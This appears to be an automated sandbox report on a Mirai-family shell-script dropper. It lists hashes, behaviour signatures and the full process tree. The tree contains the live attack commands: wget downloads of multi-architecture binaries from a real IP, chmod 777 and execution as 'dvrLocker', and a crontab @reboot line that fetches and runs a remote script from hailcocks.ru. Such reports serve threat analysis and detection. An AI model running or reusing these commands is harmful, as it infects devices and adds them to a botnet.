Analysis

max time kernel: 131s
max time network: 150s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 09-11-2024 03:32

Static task: static1

Behavioral task: behavioral1
  Sample: becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
  Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
  Sample: becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
  Resource: debian9-armhf-20240729-en

Behavioral task: behavioral3
  Sample: becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
  Resource: debian9-mipsbe-20240729-en

Behavioral task: behavioral4
  Sample: becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
  Resource: debian9-mipsel-20240226-en
General

Target: becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Size: 923B
MD5: 5419b553750dc94cb55eecefce2e1950
SHA1: bf1c8a80bcecfe13f81279a0392031d661e736ef
SHA256: becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
SHA512: fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures

Mirai family

File and Directory Permissions Modification (1 TTPs, 27 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process):
- chmod: 1672, 1677, 1683, 1688, 1693, 1698, 1703, 1712, 1718, 1723, 1728, 1733, 1738, 1743, 1748, 1757, 1762, 1767, 1772, 1777, 1782, 1787, 1792, 1801
- sh: 1705, 1750, 1794
Executes dropped EXE (24 IoCs)
Processes (ioc, pid, process):
- /tmp/lib/dvrLocker, dvrLocker: 1673, 1678, 1684, 1689, 1694, 1699, 1704, 1713
- /mnt/dvrLocker, dvrLocker: 1719, 1724, 1729, 1734, 1739, 1744, 1749, 1758, 1763, 1768, 1773, 1778, 1783, 1788, 1793, 1802
Renames itself (3 IoCs)
Processes (pid, process):
- 1704 dvrLocker
- 1749 dvrLocker
- 1793 dvrLocker
Unexpected DNS network traffic destination (4 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes (description, ioc):
- Destination IP 185.181.61.24
- Destination IP 80.152.203.134
- Destination IP 185.181.61.24
- Destination IP 5.161.109.23
Creates/modifies Cron job (1 TTPs, 3 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes (description, ioc, process):
- File opened for modification /var/spool/cron/crontabs/tmp.YT83ty crontab
- File opened for modification /var/spool/cron/crontabs/tmp.kafmbq crontab
- File opened for modification /var/spool/cron/crontabs/tmp.wKc6UU crontab
Changes its process name (3 IoCs)
Processes (description, ioc, pid, process):
- Changes the process name, possibly in an attempt to hide itself: /bin/sh /etc/init.d/rcS, 1704 dvrLocker
- Changes the process name, possibly in an attempt to hide itself: mini_httpd, 1749 dvrLocker
- Changes the process name, possibly in an attempt to hide itself: /bin/busybox ntpd, 1793 dvrLocker
Reads runtime system information
Processes (description, ioc, process):
- File opened for reading /proc/filesystems: ls (repeated across the many ls invocations in the process tree), mkdir (once)
System Network Configuration Discovery (1 TTPs, 6 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes (pid, process):
- 1676 wget
- 1680 rm
- 1722 wget
- 1726 rm
- 1766 wget
- 1770 rm
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process):
- File opened for modification /tmp/lib/dvrLocker becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes

Process tree (indentation shows depth; each entry is image: command line (PID) [matched signatures]):

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh: /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh (PID 1495) [Writes file to tmp directory]
  /bin/ls: ls -l /proc/1/exe (PID 1496) [Reads runtime system information]
  /bin/ls: ls -l /proc/10/exe (PID 1497)
  /bin/ls: ls -l /proc/1024/exe (PID 1498)
  /bin/ls: ls -l /proc/1029/exe (PID 1499) [Reads runtime system information]
  /bin/ls: ls -l /proc/1043/exe (PID 1500)
  /bin/ls: ls -l /proc/1049/exe (PID 1501)
  /bin/ls: ls -l /proc/1062/exe (PID 1502) [Reads runtime system information]
  /bin/ls: ls -l /proc/1066/exe (PID 1503) [Reads runtime system information]
  /bin/ls: ls -l /proc/1068/exe (PID 1504)
  /bin/ls: ls -l /proc/1071/exe (PID 1505) [Reads runtime system information]
  /bin/ls: ls -l /proc/1078/exe (PID 1509)
  /bin/ls: ls -l /proc/1086/exe (PID 1510)
  /bin/ls: ls -l /proc/1090/exe (PID 1511)
  /bin/ls: ls -l /proc/1099/exe (PID 1512)
  /bin/ls: ls -l /proc/11/exe (PID 1513)
  /bin/ls: ls -l /proc/1109/exe (PID 1514) [Reads runtime system information]
  /bin/ls: ls -l /proc/1119/exe (PID 1515)
  /bin/ls: ls -l /proc/1123/exe (PID 1516)
  /bin/ls: ls -l /proc/1127/exe (PID 1517) [Reads runtime system information]
  /bin/ls: ls -l /proc/1131/exe (PID 1518) [Reads runtime system information]
  /bin/ls: ls -l /proc/1135/exe (PID 1519) [Reads runtime system information]
  /bin/ls: ls -l /proc/1139/exe (PID 1520) [Reads runtime system information]
  /bin/ls: ls -l /proc/1144/exe (PID 1521)
  /bin/ls: ls -l /proc/1148/exe (PID 1522) [Reads runtime system information]
  /bin/ls: ls -l /proc/1149/exe (PID 1523) [Reads runtime system information]
  /bin/ls: ls -l /proc/115/exe (PID 1524)
  /bin/ls: ls -l /proc/1152/exe (PID 1525) [Reads runtime system information]
  /bin/ls: ls -l /proc/1153/exe (PID 1526)
  /bin/ls: ls -l /proc/1156/exe (PID 1527) [Reads runtime system information]
  /bin/ls: ls -l /proc/1163/exe (PID 1528) [Reads runtime system information]
  /bin/ls: ls -l /proc/1164/exe (PID 1529)
  /bin/ls: ls -l /proc/1167/exe (PID 1530)
  /bin/ls: ls -l /proc/1170/exe (PID 1531) [Reads runtime system information]
  /bin/ls: ls -l /proc/1176/exe (PID 1532)
  /bin/ls: ls -l /proc/1181/exe (PID 1533)
  /bin/ls: ls -l /proc/1184/exe (PID 1534) [Reads runtime system information]
  /bin/ls: ls -l /proc/1186/exe (PID 1535) [Reads runtime system information]
  /bin/ls: ls -l /proc/1187/exe (PID 1536)
  /bin/ls: ls -l /proc/1190/exe (PID 1537) [Reads runtime system information]
  /bin/ls: ls -l /proc/1193/exe (PID 1538)
  /bin/ls: ls -l /proc/1196/exe (PID 1539)
  /bin/ls: ls -l /proc/12/exe (PID 1540)
  /bin/ls: ls -l /proc/1236/exe (PID 1541) [Reads runtime system information]
  /bin/ls: ls -l /proc/1241/exe (PID 1542)
  /bin/ls: ls -l /proc/1252/exe (PID 1543)
  /bin/ls: ls -l /proc/1253/exe (PID 1544)
  /bin/ls: ls -l /proc/1268/exe (PID 1545) [Reads runtime system information]
  /bin/ls: ls -l /proc/1288/exe (PID 1546) [Reads runtime system information]
  /bin/ls: ls -l /proc/1289/exe (PID 1547) [Reads runtime system information]
  /bin/ls: ls -l /proc/1298/exe (PID 1548)
  /bin/ls: ls -l /proc/13/exe (PID 1549)
  /bin/ls: ls -l /proc/130/exe (PID 1550)
  /bin/ls: ls -l /proc/1305/exe (PID 1551) [Reads runtime system information]
  /bin/ls: ls -l /proc/1321/exe (PID 1552)
  /bin/ls: ls -l /proc/1329/exe (PID 1553)
  /bin/ls: ls -l /proc/1336/exe (PID 1554)
  /bin/ls: ls -l /proc/1345/exe (PID 1555)
  /bin/ls: ls -l /proc/1357/exe (PID 1556)
  /bin/ls: ls -l /proc/1376/exe (PID 1557)
  /bin/ls: ls -l /proc/14/exe (PID 1558)
  /bin/ls: ls -l /proc/1479/exe (PID 1559)
  /bin/ls: ls -l /proc/1480/exe (PID 1560)
  /bin/ls: ls -l /proc/1483/exe (PID 1561)
  /bin/ls: ls -l /proc/1485/exe (PID 1562)
  /bin/ls: ls -l /proc/1486/exe (PID 1563)
  /bin/ls: ls -l /proc/1495/exe (PID 1564) [Reads runtime system information]
  /bin/ls: ls -l /proc/15/exe (PID 1565)
  /bin/ls: ls -l /proc/16/exe (PID 1566)
  /bin/ls: ls -l /proc/163/exe (PID 1567)
  /bin/ls: ls -l /proc/164/exe (PID 1568)
  /bin/ls: ls -l /proc/165/exe (PID 1569) [Reads runtime system information]
  /bin/ls: ls -l /proc/166/exe (PID 1570) [Reads runtime system information]
  /bin/ls: ls -l /proc/167/exe (PID 1571) [Reads runtime system information]
  /bin/ls: ls -l /proc/168/exe (PID 1572)
  /bin/ls: ls -l /proc/169/exe (PID 1573)
  /bin/ls: ls -l /proc/17/exe (PID 1574) [Reads runtime system information]
  /bin/ls: ls -l /proc/170/exe (PID 1575) [Reads runtime system information]
  /bin/ls: ls -l /proc/171/exe (PID 1576) [Reads runtime system information]
  /bin/ls: ls -l /proc/172/exe (PID 1577)
  /bin/ls: ls -l /proc/173/exe (PID 1578)
  /bin/ls: ls -l /proc/174/exe (PID 1579) [Reads runtime system information]
  /bin/ls: ls -l /proc/175/exe (PID 1580) [Reads runtime system information]
  /bin/ls: ls -l /proc/176/exe (PID 1581) [Reads runtime system information]
  /bin/ls: ls -l /proc/177/exe (PID 1582)
  /bin/ls: ls -l /proc/178/exe (PID 1583) [Reads runtime system information]
  /bin/ls: ls -l /proc/179/exe (PID 1584)
  /bin/ls: ls -l /proc/18/exe (PID 1585) [Reads runtime system information]
  /bin/ls: ls -l /proc/180/exe (PID 1586)
  /bin/ls: ls -l /proc/182/exe (PID 1587) [Reads runtime system information]
  /bin/ls: ls -l /proc/19/exe (PID 1588) [Reads runtime system information]
  /bin/ls: ls -l /proc/2/exe (PID 1589)
  /bin/ls: ls -l /proc/20/exe (PID 1590) [Reads runtime system information]
  /bin/ls: ls -l /proc/207/exe (PID 1591) [Reads runtime system information]
  /bin/ls: ls -l /proc/208/exe (PID 1592) [Reads runtime system information]
  /bin/ls: ls -l /proc/21/exe (PID 1593)
  /bin/ls: ls -l /proc/22/exe (PID 1594) [Reads runtime system information]
  /bin/ls: ls -l /proc/23/exe (PID 1595)
  /bin/ls: ls -l /proc/24/exe (PID 1596)
  /bin/ls: ls -l /proc/242/exe (PID 1597)
  /bin/ls: ls -l /proc/25/exe (PID 1598)
  /bin/ls: ls -l /proc/26/exe (PID 1599)
  /bin/ls: ls -l /proc/27/exe (PID 1600)
  /bin/ls: ls -l /proc/273/exe (PID 1601)
  /bin/ls: ls -l /proc/28/exe (PID 1602)
  /bin/ls: ls -l /proc/29/exe (PID 1603)
  /bin/ls: ls -l /proc/3/exe (PID 1604) [Reads runtime system information]
  /bin/ls: ls -l /proc/30/exe (PID 1605)
  /bin/ls: ls -l /proc/31/exe (PID 1606)
  /bin/ls: ls -l /proc/32/exe (PID 1607)
  /bin/ls: ls -l /proc/322/exe (PID 1608)
  /bin/ls: ls -l /proc/325/exe (PID 1609) [Reads runtime system information]
  /bin/ls: ls -l /proc/34/exe (PID 1610) [Reads runtime system information]
  /bin/ls: ls -l /proc/35/exe (PID 1611) [Reads runtime system information]
  /bin/ls: ls -l /proc/36/exe (PID 1612)
  /bin/ls: ls -l /proc/4/exe (PID 1613)
  /bin/ls: ls -l /proc/417/exe (PID 1614)
  /bin/ls: ls -l /proc/425/exe (PID 1615) [Reads runtime system information]
  /bin/ls: ls -l /proc/428/exe (PID 1616) [Reads runtime system information]
  /bin/ls: ls -l /proc/444/exe (PID 1617)
  /bin/ls: ls -l /proc/452/exe (PID 1618)
  /bin/ls: ls -l /proc/457/exe (PID 1619)
  /bin/ls: ls -l /proc/464/exe (PID 1620) [Reads runtime system information]
  /bin/ls: ls -l /proc/465/exe (PID 1621)
  /bin/ls: ls -l /proc/468/exe (PID 1622)
  /bin/ls: ls -l /proc/469/exe (PID 1623)
  /bin/ls: ls -l /proc/477/exe (PID 1624)
  /bin/ls: ls -l /proc/488/exe (PID 1625) [Reads runtime system information]
  /bin/ls: ls -l /proc/490/exe (PID 1626)
  /bin/ls: ls -l /proc/495/exe (PID 1627)
  /bin/ls: ls -l /proc/496/exe (PID 1628)
  /bin/ls: ls -l /proc/499/exe (PID 1629) [Reads runtime system information]
  /bin/ls: ls -l /proc/5/exe (PID 1630) [Reads runtime system information]
  /bin/ls: ls -l /proc/516/exe (PID 1631)
  /bin/ls: ls -l /proc/518/exe (PID 1632)
  /bin/ls: ls -l /proc/545/exe (PID 1633)
  /bin/ls: ls -l /proc/551/exe (PID 1634) [Reads runtime system information]
  /bin/ls: ls -l /proc/562/exe (PID 1635)
  /bin/ls: ls -l /proc/586/exe (PID 1636)
  /bin/ls: ls -l /proc/6/exe (PID 1637) [Reads runtime system information]
  /bin/ls: ls -l /proc/606/exe (PID 1638)
  /bin/ls: ls -l /proc/608/exe (PID 1639)
  /bin/ls: ls -l /proc/633/exe (PID 1640)
  /bin/ls: ls -l /proc/641/exe (PID 1641) [Reads runtime system information]
  /bin/ls: ls -l /proc/644/exe (PID 1642) [Reads runtime system information]
  /bin/ls: ls -l /proc/673/exe (PID 1643)
  /bin/ls: ls -l /proc/680/exe (PID 1644) [Reads runtime system information]
  /bin/ls: ls -l /proc/683/exe (PID 1645) [Reads runtime system information]
  /bin/ls: ls -l /proc/7/exe (PID 1646)
  /bin/ls: ls -l /proc/710/exe (PID 1647) [Reads runtime system information]
  /bin/ls: ls -l /proc/715/exe (PID 1648)
  /bin/ls: ls -l /proc/722/exe (PID 1649)
  /bin/ls: ls -l /proc/78/exe (PID 1650)
  /bin/ls: ls -l /proc/79/exe (PID 1651)
  /bin/ls: ls -l /proc/8/exe (PID 1652)
  /bin/ls: ls -l /proc/80/exe (PID 1653)
  /bin/ls: ls -l /proc/81/exe (PID 1654) [Reads runtime system information]
  /bin/ls: ls -l /proc/82/exe (PID 1655)
  /bin/ls: ls -l /proc/83/exe (PID 1656) [Reads runtime system information]
  /bin/ls: ls -l /proc/84/exe (PID 1657) [Reads runtime system information]
  /bin/ls: ls -l /proc/85/exe (PID 1658)
  /bin/ls: ls -l /proc/89/exe (PID 1659)
  /bin/ls: ls -l /proc/9/exe (PID 1660)
  /bin/ls: ls -l /proc/908/exe (PID 1661)
  /bin/ls: ls -l /proc/953/exe (PID 1662)
  /bin/ls: ls -l /proc/957/exe (PID 1663)
  /bin/ls: ls -l /proc/962/exe (PID 1664) [Reads runtime system information]
  /bin/ls: ls -l /proc/966/exe (PID 1665)
  /bin/ls: ls -l /proc/969/exe (PID 1666)
  /bin/ls: ls -l /proc/98/exe (PID 1667)
  /bin/rm: rm -rf /tmp/lib/ (PID 1668)
  /bin/rm: rm -rf /tmp/lib/dvrLocker (PID 1669)
  /bin/mkdir: mkdir /tmp/lib/ (PID 1670) [Reads runtime system information]
  /usr/bin/wget: wget http://45.202.35.91/tmpsl -O - (PID 1671)
  /bin/chmod: chmod 777 dvrLocker (PID 1672) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1673) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1673)
  /bin/rm: rm -rf tmpsl (PID 1675)
  /usr/bin/wget: wget http://45.202.35.91/tmips -O - (PID 1676) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 1677) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1678) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1678)
  /bin/rm: rm -rf tmips (PID 1680) [System Network Configuration Discovery]
  /usr/bin/wget: wget http://45.202.35.91/tarm -O - (PID 1681)
  /bin/chmod: chmod 777 dvrLocker (PID 1683) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1684) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1684)
  /bin/rm: rm -rf tarm (PID 1686)
  /usr/bin/wget: wget http://45.202.35.91/tarm5 -O - (PID 1687)
  /bin/chmod: chmod 777 dvrLocker (PID 1688) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1689) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1689)
  /bin/rm: rm -rf tarm5 (PID 1691)
  /usr/bin/wget: wget http://45.202.35.91/tppc -O - (PID 1692)
  /bin/chmod: chmod 777 dvrLocker (PID 1693) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1694) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1694)
  /bin/rm: rm -rf tppc (PID 1696)
  /usr/bin/wget: wget http://45.202.35.91/tarm7 -O - (PID 1697)
  /bin/chmod: chmod 777 dvrLocker (PID 1698) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1699) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1699)
  /bin/rm: rm -rf tarm7 (PID 1701)
  /usr/bin/wget: wget http://45.202.35.91/x86 -O - (PID 1702)
  /bin/chmod: chmod 777 dvrLocker (PID 1703) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1704) [Executes dropped EXE; Renames itself; Changes its process name]
    /bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (PID 1705) [File and Directory Permissions Modification]
      /usr/bin/crontab: crontab - (PID 1707) [Creates/modifies Cron job]
      /usr/bin/crontab: crontab -l (PID 1708)
  /bin/rm: rm -rf x86 (PID 1710)
  /usr/bin/wget: wget http://45.202.35.91/tarm6 -O - (PID 1711)
  /bin/chmod: chmod 777 dvrLocker (PID 1712) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 1713) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1713)
  /bin/rm: rm -rf tarm6 (PID 1715)
  /bin/rm: rm -rf /mnt/dvrLocker (PID 1716)
  /usr/bin/wget: wget http://45.202.35.91/tmpsl -O - (PID 1717)
  /bin/chmod: chmod 777 dvrLocker (PID 1718) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1719) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1719)
  /bin/rm: rm -rf tmpsl (PID 1721)
  /usr/bin/wget: wget http://45.202.35.91/tmips -O - (PID 1722) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 1723) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1724) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1724)
  /bin/rm: rm -rf tmips (PID 1726) [System Network Configuration Discovery]
  /usr/bin/wget: wget http://45.202.35.91/tarm -O - (PID 1727)
  /bin/chmod: chmod 777 dvrLocker (PID 1728) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1729) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1729)
  /bin/rm: rm -rf tarm (PID 1731)
  /usr/bin/wget: wget http://45.202.35.91/tarm5 -O - (PID 1732)
  /bin/chmod: chmod 777 dvrLocker (PID 1733) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1734) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1734)
  /bin/rm: rm -rf tarm5 (PID 1736)
  /usr/bin/wget: wget http://45.202.35.91/tppc -O - (PID 1737)
  /bin/chmod: chmod 777 dvrLocker (PID 1738) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1739) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1739)
  /bin/rm: rm -rf tppc (PID 1741)
  /usr/bin/wget: wget http://45.202.35.91/tarm7 -O - (PID 1742)
  /bin/chmod: chmod 777 dvrLocker (PID 1743) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1744) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1744)
  /bin/rm: rm -rf tarm7 (PID 1746)
  /usr/bin/wget: wget http://45.202.35.91/x86 -O - (PID 1747)
  /bin/chmod: chmod 777 dvrLocker (PID 1748) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1749) [Executes dropped EXE; Renames itself; Changes its process name]
    /bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (PID 1750) [File and Directory Permissions Modification]
      /usr/bin/crontab: crontab - (PID 1752) [Creates/modifies Cron job]
      /usr/bin/crontab: crontab -l (PID 1753)
  /bin/rm: rm -rf x86 (PID 1755)
  /usr/bin/wget: wget http://45.202.35.91/tarm6 -O - (PID 1756)
  /bin/chmod: chmod 777 dvrLocker (PID 1757) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1758) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1758)
  /bin/rm: rm -rf tarm6 (PID 1760)
  /usr/bin/wget: wget http://45.202.35.91/tmpsl -O - (PID 1761)
  /bin/chmod: chmod 777 dvrLocker (PID 1762) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1763) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1763)
  /bin/rm: rm -rf tmpsl (PID 1765)
  /usr/bin/wget: wget http://45.202.35.91/tmips -O - (PID 1766) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 1767) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1768) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1768)
  /bin/rm: rm -rf tmips (PID 1770) [System Network Configuration Discovery]
  /usr/bin/wget: wget http://45.202.35.91/tarm -O - (PID 1771)
  /bin/chmod: chmod 777 dvrLocker (PID 1772) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1773) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1773)
  /bin/rm: rm -rf tarm (PID 1775)
  /usr/bin/wget: wget http://45.202.35.91/tarm5 -O - (PID 1776)
  /bin/chmod: chmod 777 dvrLocker (PID 1777) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1778) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1778)
  /bin/rm: rm -rf tarm5 (PID 1780)
  /usr/bin/wget: wget http://45.202.35.91/tppc -O - (PID 1781)
  /bin/chmod: chmod 777 dvrLocker (PID 1782) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1783) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1783)
  /bin/rm: rm -rf tppc (PID 1785)
  /usr/bin/wget: wget http://45.202.35.91/tarm7 -O - (PID 1786)
  /bin/chmod: chmod 777 dvrLocker (PID 1787) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1788) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1788)
  /bin/rm: rm -rf tarm7 (PID 1790)
  /usr/bin/wget: wget http://45.202.35.91/x86 -O - (PID 1791)
  /bin/chmod: chmod 777 dvrLocker (PID 1792) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1793) [Executes dropped EXE; Renames itself; Changes its process name]
    /bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (PID 1794) [File and Directory Permissions Modification]
      /usr/bin/crontab: crontab - (PID 1796) [Creates/modifies Cron job]
      /usr/bin/crontab: crontab -l (PID 1797)
  /bin/rm: rm -rf x86 (PID 1799)
  /usr/bin/wget: wget http://45.202.35.91/tarm6 -O - (PID 1800)
  /bin/chmod: chmod 777 dvrLocker (PID 1801) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 1802) [Executes dropped EXE]
  /bin/sh: /bin/sh ./dvrLocker tplink.new (PID 1802)
  /bin/rm: rm -rf tarm6 (PID 1804)
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 93KB
MD5: bb9275394716c60d1941432c7085ca13
SHA1: 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256: 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512: 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

Filesize: 306B
MD5: aa6236daa7d70f1a76eb197a0c42f2e8
SHA1: 86acf7fa9f0bb64920282a89d46dddded4391f31
SHA256: c68bab04e8a86ffc1a19fe66341b7c14212af3df011b57d61eb218a206ca4fab
SHA512: 5c6f4a9c4a3cdb12b4370efe26fad53ce3a5b4bd8074a6960c24542eb74dbe870db84a188902dd837df9aaa52317cdb5c5fc0120dd28e25d19a98d0ee9128642

Filesize: 437B
MD5: e58051ca9579fa36df18c83aa8016617
SHA1: 901514003c1a32f945c7ebdb132bab290b2e9da3
SHA256: 984911f805d18824cb0dbdad9ca9913c124669d9e3eb7102e4e576a48c98b7be
SHA512: 735aa551bbe2ae83f338b5c7c4d064b86e989e9e717bfc5d308165a81a9840e0022e3e89dfef40e5817a582928d7c97f7ca3a3eea68d3a4cc9d859562b50e8f6

Filesize: 568B
MD5: 3aa2a28ef3f5f27b7e64c32c9d716874
SHA1: 7fa732c1a320d458ad84da4d885edc682c5a0600
SHA256: 900a42d0127c2a27d4ce3029b9b0aa61a4a288012426476f9c801f59394b95b0
SHA512: e9e30db5a2a0da8f153399307ab378bb50ba03e87d0f4a9d3d5e4e4a294b51f51397478a163e2738ca0880f092f5922d5ac2d13c3834b1dc399c97bfbc4d2de2